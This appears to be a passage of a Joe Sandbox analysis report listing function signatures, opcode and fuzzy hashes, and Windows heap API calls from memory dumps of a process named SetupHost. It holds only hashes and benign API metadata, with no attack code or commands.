                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff76db6782604a90832577c65d9274d1031163f590d8bb92ccb15a9fac92d60c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0F082716043506BC331ABE2AC0CF9B7EB9AFC4751F058818F549C6184CF74CC06C6A1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000,009E7292,?,00000000,?,009E76BB,?,?,?,?), ref: 009E80DA
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,00000000,?,009E76BB,?,?,?,?), ref: 009E80E1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,?,009E76BB,?,?,?,?), ref: 009E8113
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009E811A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                • Opcode ID: 498b2218b82478e6f6f2c9e3a955e64af6ad041ec0593cd4b91ed259d90a7ac0
                                                                                                                                                                                                                • Instruction ID: db845cfd741c5444af74c2947707051b0c5627d4e670fcae8e0ef8e9ee26a91e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 498b2218b82478e6f6f2c9e3a955e64af6ad041ec0593cd4b91ed259d90a7ac0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7F054715087515BC322DBE6A808BAB7AFCAF48751B058929F41AC7640DF70DC0687A1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009E81C8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E81CF
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 009E81E0
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009E81E7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                • Opcode ID: 304984c97eb0ed5b1bd5c83c0f25c8f1eb16a4a81b1259375b959fc5e82a5745
                                                                                                                                                                                                                • Instruction ID: 26522c1e22f5cf18ffe48bcad0a89a9ffbf349ab7613159a5a9d1ac56f34c907
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 304984c97eb0ed5b1bd5c83c0f25c8f1eb16a4a81b1259375b959fc5e82a5745
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9EE0ED32509310A7D7329FD5ED0CB9B7BBCAB14B92F045459B50992490CB709806CBA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00A0019C), ref: 00A002E4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A002EB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00A0019C), ref: 00A002F4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A002FB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$FreeProcess
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3859560861-0
                                                                                                                                                                                                                • Opcode ID: 2d4d6116daebe57cbd80b83b4ab17577001bebbc8da6c50c2b22d913ba026a90
                                                                                                                                                                                                                • Instruction ID: 54ef7c91ce26908eff01d1451c76e4912b69ac1812d27403a5f42426448fe7f2
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d4d6116daebe57cbd80b83b4ab17577001bebbc8da6c50c2b22d913ba026a90
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DFD01732108221ABC7209BE4AC0CFDE7E78AB58792F049459B249820E0CAB04852CB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%